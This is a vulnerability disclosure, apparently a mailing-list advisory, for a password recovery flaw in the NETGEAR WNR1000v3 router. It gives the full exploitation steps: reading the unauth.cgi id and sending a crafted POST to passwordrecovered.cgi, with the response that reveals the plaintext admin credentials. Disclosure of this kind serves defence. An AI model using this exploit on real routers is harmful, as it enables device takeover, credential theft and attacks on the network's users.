NETGEAR WNR1000v3 Password Recovery Vulnerability

[c1ph04mail () gmail com]

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery 
vulnerability.

Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and 
subsequently gain full access to the device. This vulnerabilty can be exploited remotely if the remote administration 
access feature is enabled (as well as locally via wired or wireless access).

Tested Device Model: Netgear N150 WNR1000v3

Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and V1.0.2.62_60.0.87

Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS 
control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for 
guest and private network) firewall rule and port forwarding manipulation, etc.

Vulnerabilty Status: Vulnerability was privately disclosed to the vendor in June of 2013, however they have not yet 
issued a patch.

Other Notes: This vulnerability remains exploitable when the password recovery feature of the router is disabled.

Overview:

The password recovery mechanism appears to be designed to work as follows:

1.) After failing to login the user will be redirected to a password recovery page that requests the router serial 
number

2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 
2 secret questions

3.) If the user answers the secret questions correctly, the router username and password is displayed


The problem: The implementation of this password recovery method has issues...lots of issues


Vulnerability and Exploit Details:

1.) Access the router login through a web browser: http://192.168.1.1

2.) Select "Cancel" on the HTTP basic login box (or enter arbitrary credentials), the router responds with the 
following (Note the "unauth.cgi?id" parameter):

--------------------------------------------------

HTTP/1.0 401 Unauthorized

WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"

Content-type: text/html
 
<html>
 
<head>
 
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
 
<title>401 Unauthorized</title></head>
 
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
 
<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" 
action="unauth.cgi?id=78185530" name="aForm"></form></body>
 
</html>
--------------------------------------------------
 
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
 
-------------------------------------------------------------------------------------------------
 
POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
 
Accept: text/html, application/xhtml+xml, */*
 
Accept-Language: en-US
 
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
 
Content-Type: application/x-www-form-urlencoded
 
Accept-Encoding: gzip, deflate
 
Host: 192.168.1.1
 
Content-Length: 35
 
Connection: Keep-Alive
 
Pragma: no-cache

--------------------------------------------------
The username and (plaintext) password are returned in the response (truncated for brevity):
--------------------------------------------------
..
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 </tr>
 <tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
 </tr>
..
--------------------------------------------------

Additional details and proof-of-concept exploit can be found here: 

http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html